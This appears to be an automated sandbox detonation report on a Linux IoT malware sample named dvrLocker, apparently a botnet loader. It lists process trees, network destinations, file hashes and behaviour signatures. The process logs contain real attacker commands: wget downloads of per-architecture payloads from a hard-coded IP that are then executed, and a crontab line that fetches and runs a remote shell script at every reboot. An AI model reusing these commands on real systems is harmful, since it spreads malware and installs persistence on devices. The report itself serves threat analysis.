[ls -l /proc/140/exe]

/bin/ls

[ls -l /proc/144/exe]

/bin/ls

[ls -l /proc/146/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/153/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/168/exe]

/bin/ls

[ls -l /proc/169/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/235/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/25/exe]

/bin/ls

[ls -l /proc/26/exe]

/bin/ls

[ls -l /proc/27/exe]

/bin/ls

[ls -l /proc/28/exe]

/bin/ls

[ls -l /proc/29/exe]

/bin/ls

[ls -l /proc/291/exe]

/bin/ls

[ls -l /proc/292/exe]

/bin/ls

[ls -l /proc/293/exe]

/bin/ls

[ls -l /proc/295/exe]

/bin/ls

[ls -l /proc/298/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/322/exe]

/bin/ls

[ls -l /proc/324/exe]

/bin/ls

[ls -l /proc/327/exe]

/bin/ls

[ls -l /proc/344/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/41/exe]

/bin/ls

[ls -l /proc/42/exe]

/bin/ls

[ls -l /proc/43/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/589/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/605/exe]

/bin/ls

[ls -l /proc/607/exe]

/bin/ls

[ls -l /proc/609/exe]

/bin/ls

[ls -l /proc/610/exe]

/bin/ls

[ls -l /proc/641/exe]

/bin/ls

[ls -l /proc/647/exe]

/bin/ls

[ls -l /proc/648/exe]

/bin/ls

[ls -l /proc/650/exe]

/bin/ls

[ls -l /proc/652/exe]

/bin/ls

[ls -l /proc/653/exe]

/bin/ls

[ls -l /proc/654/exe]

/bin/ls

[ls -l /proc/655/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf /mnt/dvrLocker]

Network

Country Destination Domain Proto
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
US 168.235.111.72:53 kingstonwikkerink.dyn udp
BG 31.13.248.234:5372 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

memory/808-1-0xb678b000-0xb679c044-memory.dmp

/tmp/lib/dvrLocker

MD5 d09db60a70d5b53b5b53ad39476fd7e8
SHA1 73a75e5e8200f77d857a7256cc0979077e29241d
SHA256 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165
SHA512 ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

/var/spool/cron/crontabs/tmp.7ecNDm

MD5 7d430e045766ddb81fa3cdc9a1615d90
SHA1 79dfcc0c73acbf0b65f441d0a1eb56099079fbd3
SHA256 92d638a1e2a2c268a45a7c205c60a607ef650bf9982c589931ffd9303cb121ab
SHA512 1c2b5933370207dd545b856cf516a7cdc4d3e7e95ccc06a4e398af3be4e3674f6afec9e391e89c2486eaba0d00d7057fcf40e4369dd9a9b3e2077210ce2ec631

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

debian9-mipsbe-20240418-en

Max time kernel

149s

Max time network

137s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 81.169.136.222 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.hCusdS /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself [watchdog/0] /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/911/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/923/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/856/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/903/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/910/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/918/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/850/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/895/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/920/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/925/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/866/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/847/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/868/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/922/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/843/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/873/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/842/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/899/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/880/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/898/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/919/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/906/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/912/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/885/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/846/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/851/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/841/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/867/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/924/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/849/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/870/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/882/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/886/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/893/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/704/cmdline /tmp/lib/dvrLocker N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/110/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/126/exe]

/bin/ls

[ls -l /proc/127/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/152/exe]

/bin/ls

[ls -l /proc/159/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/176/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/243/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/330/exe]

/bin/ls

[ls -l /proc/333/exe]

/bin/ls

[ls -l /proc/334/exe]

/bin/ls

[ls -l /proc/336/exe]

/bin/ls

[ls -l /proc/337/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/389/exe]

/bin/ls

[ls -l /proc/391/exe]

/bin/ls

[ls -l /proc/394/exe]

/bin/ls

[ls -l /proc/399/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/402/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/661/exe]

/bin/ls

[ls -l /proc/674/exe]

/bin/ls

[ls -l /proc/677/exe]

/bin/ls

[ls -l /proc/679/exe]

/bin/ls

[ls -l /proc/680/exe]

/bin/ls

[ls -l /proc/696/exe]

/bin/ls

[ls -l /proc/697/exe]

/bin/ls

[ls -l /proc/699/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/702/exe]

/bin/ls

[ls -l /proc/703/exe]

/bin/ls

[ls -l /proc/704/exe]

/bin/ls

[ls -l /proc/705/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/79/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/82/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/rm

[rm -rf mips]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.125.66.90/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.125.66.90/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.125.66.90/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.125.66.90/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.125.66.90/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.125.66.90/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.125.66.90/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

Network

Country Destination Domain Proto
LT 45.125.66.90:80 45.125.66.90 tcp
LT 45.125.66.90:80 45.125.66.90 tcp
DE 81.169.136.222:53 kingstonwikkerink.dyn udp
FR 194.58.66.244:10875 kingstonwikkerink.dyn tcp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/tmp/lib/dvrLocker

MD5 559f129d380ad1cfb60792c6b2dc3d32
SHA1 3997a0fc0bd5958783f1751364ec407c5b170adc
SHA256 fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA512 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112

/var/spool/cron/crontabs/tmp.hCusdS

MD5 52e1ad18d178f2dcf0faeda00070f21e
SHA1 c683c24e4fe9a0ed77cb7623e061d86179185397
SHA256 d34450689b23cae53222c9fc6c976d4b7a72ede1c77caea45659a2cb3387f9a1
SHA512 112c995b57dffa2713a0d5610d90b55b70d56703b66b970bf1f7d82b74c5518770882c3d43c23286cdc1fce7acb4b55c4d6b3e71f9513e8052437caeaf6c0ffa

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-27 02:39

Reported

2024-11-27 02:42

Platform

debian9-mipsel-20240226-en

Max time kernel

150s

Max time network

140s

Command Line

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/sh N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A
N/A /tmp/lib/dvrLocker /tmp/lib/dvrLocker N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/lib/dvrLocker N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 217.160.70.42 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.Uw0tZs /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox ntpd /tmp/lib/dvrLocker N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/889/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/873/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/874/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/922/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/924/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/852/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/898/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/901/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/911/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/mkdir N/A
File opened for reading /proc/710/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/926/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/863/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/864/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/912/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/855/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/865/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/886/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/mounts /tmp/lib/dvrLocker N/A
File opened for reading /proc/841/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/857/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/902/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/908/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/836/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/844/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/882/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/885/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/916/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/919/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/881/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/896/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/900/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/905/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/917/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/850/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/861/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/890/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/837/status /tmp/lib/dvrLocker N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown N/A

Processes

/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown

[/tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/105/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/114/exe]

/bin/ls

[ls -l /proc/115/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/143/exe]

/bin/ls

[ls -l /proc/148/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/164/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/245/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/320/exe]

/bin/ls

[ls -l /proc/336/exe]

/bin/ls

[ls -l /proc/340/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/365/exe]

/bin/ls

[ls -l /proc/366/exe]

/bin/ls

[ls -l /proc/367/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/385/exe]

/bin/ls

[ls -l /proc/386/exe]

/bin/ls

[ls -l /proc/395/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/402/exe]

/bin/ls

[ls -l /proc/484/exe]

/bin/ls

[ls -l /proc/497/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/526/exe]

/bin/ls

[ls -l /proc/527/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/688/exe]

/bin/ls

[ls -l /proc/69/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

